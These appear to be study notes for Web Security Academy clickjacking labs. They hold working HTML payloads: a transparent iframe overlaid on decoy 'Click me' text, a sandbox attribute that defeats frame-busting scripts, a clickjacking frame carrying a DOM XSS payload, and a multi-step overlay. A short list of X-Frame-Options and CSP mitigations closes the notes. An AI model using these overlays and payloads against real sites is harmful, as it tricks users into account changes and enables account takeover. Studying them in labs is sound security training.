
# 1.Basic Clicking using html script
<style>
    iframe {
        position:relative;
        width:1000px; # width of iframe in browser 
        height: 700px; # length of iframe in browser
        opacity: 0.0001; # opacity used for maintanece transparency adjusted 
        z-index: 2;
    }
# div section used text direction adjustment below *Click me* #
    div {
        position:absolute;
        top:515px;
        left:60px; 
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe src="https://0aa2001a04534341801c3630007400f3.web-security-academy.net/my-account"></iframe>



# 2.frame busting browser security might protection defence to bypass  we use *** sandbox ="allow-forms" ***
<iframe sandbox="allow-forms"
src="YOUR-LAB-ID.web-security-academy.net/my-account?email=hacker@attacker-website.com"></iframe>


# 3.if find any xss dom vulnerability then clickjacking interlink inside iframe there is xss payloads start with <img src=1 onerror=print()>
<iframe
src="https://0af000f704150d3880f403e9000100e5.web-security-academy.net/feedback?name=<img src=1 onerror=print()>&email=hacker@attacker-website.com&subject=test&message=test#feedbackResult"></iframe>

#4. multi clickjacking
<style>
	iframe {
		position:relative;
		width:1000px;
		height: 1000px;
		opacity: 0.1;
		z-index: 2;
	}
   .firstClick, .secondClick {
		position:absolute;
		top:450px;
		left:60px;
		z-index: 1;
	}
   .secondClick {
		top:525px;
		left:60px;
	}
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://0a8600b1030a293082871a1f006e0014.web-security-academy.net/my-account"></iframe>

###########################################################################################
mitigation for clickjacking
 
1.X-FRAME-Options:deny # no frame in website 
2.x-frame-options:sameorigin #loading from sameorigin or samesite
3.X-frame-options: allow-from https:ksbak.com   # whitelisting
3. default frame busting scripts has been secure by browseer
4.Content-security-policy (CSP) :
     1.frame-ancestors 'self'; # samesite or sameorigin 
     2.frame-ancestors normal-website.com; #whitelisting
    3.frame-ancestors 'none'# no frame are accessible
